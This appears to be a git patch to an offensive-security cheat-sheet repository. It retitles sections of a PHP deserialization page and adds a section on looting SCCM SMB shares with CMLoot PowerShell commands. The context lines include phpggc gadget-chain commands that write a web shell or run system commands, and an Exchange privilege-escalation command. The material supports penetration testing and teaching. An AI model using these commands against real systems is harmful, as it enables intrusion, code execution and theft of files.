From d67ec2469cfec8e506561414f1feb98422c490f9 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 4 Dec 2022 11:38:19 +0100
Subject: [PATCH] SCCM Shares
---
 Insecure Deserialization/PHP.md | 8 +++++---
 Methodology and Resources/Active Directory Attack.md | 12 ++++++++++++
 2 files changed, 17 insertions(+), 3 deletions(-)
diff --git a/Insecure Deserialization/PHP.md b/Insecure Deserialization/PHP.md
index 87083c6..57c513b 100644
--- a/Insecure Deserialization/PHP.md
+++ b/Insecure Deserialization/PHP.md
@@ -14,8 +14,9 @@ Also you should check the `Wrapper Phar://` in [File Inclusion](https://github.c
 * [General concept](#general-concept)
 * [Authentication bypass](#authentication-bypass)
+* [Object Injection](#object-injection)
 * [Finding and using gadgets](#finding-and-using-gadgets)
-* [PHP Phar Deserialization](#php-phar-deserialization)
+* [Phar Deserialization](#phar-deserialization)
 * [Real world examples](#real-world-examples)
 * [References](#references)
@@ -82,7 +83,7 @@ a:2:{s:8:"username";b:1;s:8:"password";b:1;}
 Because `true == "str"` is true.
-### Object reference
+## Object Injection
 Vulnerable code:
@@ -145,7 +146,7 @@ phpggc swiftmailer/fw1 /var/www/html/shell.php /tmp/data
 phpggc Monolog/RCE2 system 'id' -p phar -o /tmp/testinfo.ini
 ```
-## PHP Phar Deserialization
+## Phar Deserialization
 Using `phar://` wrapper, one can trigger a deserialization on the specified file like in `file_get_contents("phar://./archives/app.phar")`.
@@ -237,3 +238,4 @@ A valid PHAR includes four elements:
 * [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
 * [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
 * [phar:// deserialization - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-inclusion/phar-deserialization)
+* [Finding PHP Serialization Gadget Chain - DG'hAck Unserial killer - Aug 11, 2022 - xanhacks](https://www.xanhacks.xyz/p/php-gadget-chain/#introduction)
\ No newline at end of file
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index 9088d15..4f3f119 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -120,6 +120,7 @@
 - [PrivExchange attack](#privexchange-attack)
 - [SCCM Deployment](#sccm-deployment)
 - [SCCM Network Access Accounts](#sccm-network-access-accounts)
+ - [SCCM Shares](#sccm-shares)
 - [WSUS Deployment](#wsus-deployment)
 - [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise)
 - [PXE Boot image attack](#pxe-boot-image-attack)
@@ -3742,6 +3743,17 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
 ConvertFrom-SddlString ""
 ```
+### SCCM Shares
+
+> Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
+
+* [1njected/CMLoot](https://github.com/1njected/CMLoot)
+ ```ps1
+ Invoke-CMLootInventory -SCCMHost sccm01.domain.local -Outfile sccmfiles.txt
+ Invoke-CMLootDownload -SingleFile \\sccm\SCCMContentLib$\DataLib\SC100001.1\x86\MigApp.xml
+ Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi
+ ```
+
 ### WSUS Deployment